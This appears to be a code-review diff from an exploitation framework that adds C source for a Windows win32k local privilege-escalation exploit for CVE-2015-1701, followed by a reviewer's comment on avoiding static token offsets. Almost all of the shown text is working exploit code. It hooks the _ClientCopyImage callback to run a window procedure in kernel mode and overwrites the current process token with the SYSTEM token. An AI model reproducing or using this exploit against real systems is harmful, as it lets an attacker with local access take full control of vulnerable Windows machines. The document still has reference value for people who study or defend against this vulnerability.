external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c

```diff
@@ -0,0 +1,524 @@
+	}
+
+	return FuncAddress;
+}
+
+/*
+* GetFirstThreadHWND
+*
+* Purpose:
+*
+* Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
+*
+*/
+HWND GetFirstThreadHWND(
+	VOID
+	)
+{
+	PSHAREDINFO		pse;
+	HMODULE			huser32;
+	PHANDLEENTRY	List;
+	ULONG_PTR		c, k;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return 0;
+
+	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
+	if (pse == NULL)
+		return 0;
+
+	List = pse->aheList;
+	k = pse->psi->cHandleEntries;
+
+	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		return 0;
+
+	//
+	// Locate, convert and return hwnd for current thread.
+	//
+	for (c = 0; c < k; c++)
+		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
+			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
+		}
+
+	return 0;
+}
+
+/*
+* StealProcessToken
+*
+* Purpose:
+*
+* Copy system token to current process object.
+*
+*/
+NTSTATUS NTAPI StealProcessToken(
+	VOID
+	)
+{
+	NTSTATUS Status;
+	PVOID CurrentProcess = NULL;
+	PVOID SystemProcess = NULL;
+
+	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
+	if (NT_SUCCESS(Status)) {
+		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
+		if (NT_SUCCESS(Status)) {
+			if (g_EPROCESS_TokenOffset) {
+				*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
+			}
+		}
+	}
+	return Status;
+}
+
+
+/*
+* MainWindowProc
+*
+* Purpose:
+*
+* To be called in ring0.
+*
+*/
+LRESULT CALLBACK MainWindowProc(
+	_In_ HWND hwnd,
+	_In_ UINT uMsg,
+	_In_ WPARAM wParam,
+	_In_ LPARAM lParam
+	)
+{
+	UNREFERENCED_PARAMETER(hwnd);
+	UNREFERENCED_PARAMETER(uMsg);
+	UNREFERENCED_PARAMETER(wParam);
+	UNREFERENCED_PARAMETER(lParam);
+
+	if (g_shellCalled == 0) {
+		StealProcessToken();
+		g_shellCalled = 1;
+	}
+
+	return 0;
+}
+
+/*
+* hookCCI
+*
+* Purpose:
+*
+* _ClientCopyImage hook handler.
+*
+*/
+NTSTATUS NTAPI hookCCI(
+	PVOID p
+	)
+{
+	InterlockedExchangePointer(g_ppCCI, g_originalCCI); //restore original callback
+
+	SetWindowLongPtr(GetFirstThreadHWND(), GWLP_WNDPROC, (LONG_PTR)&DefWindowProc);
+
+	return g_originalCCI(p);
+}
+
+void win32k_client_copy_image(LPVOID lpPayload)
+{
+
+	PTEB			teb = NtCurrentTeb();
+	PPEB			peb = teb->ProcessEnvironmentBlock;
+	WNDCLASSEX		wincls;
+	HINSTANCE		hinst = GetModuleHandle(NULL);
+	BOOL			rv = TRUE;
+	MSG				msg1;
+	ATOM			class_atom;
+	HWND			MainWindow;
+	DWORD			prot;
+	OSVERSIONINFOW	osver;
+
+	RtlSecureZeroMemory(&osver, sizeof(osver));
+	osver.dwOSVersionInfoSize = sizeof(osver);
+	RtlGetVersion(&osver);
+	
+	if (osver.dwBuildNumber > 7601) {
+		ExitProcess((UINT)-1);
+		return;
+	}
+
+	if (supIsProcess32bit(GetCurrentProcess())) {
+		ExitProcess((UINT)-2);
+		return;
+	}
+
+	g_OurPID = GetCurrentProcessId();
+	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+
+#ifdef _WIN64
+	g_EPROCESS_TokenOffset = 0x208;

```

Comment:
Perhaps this could use the same technique that was employed in CVE-2014-4113 to avoid using static token offsets.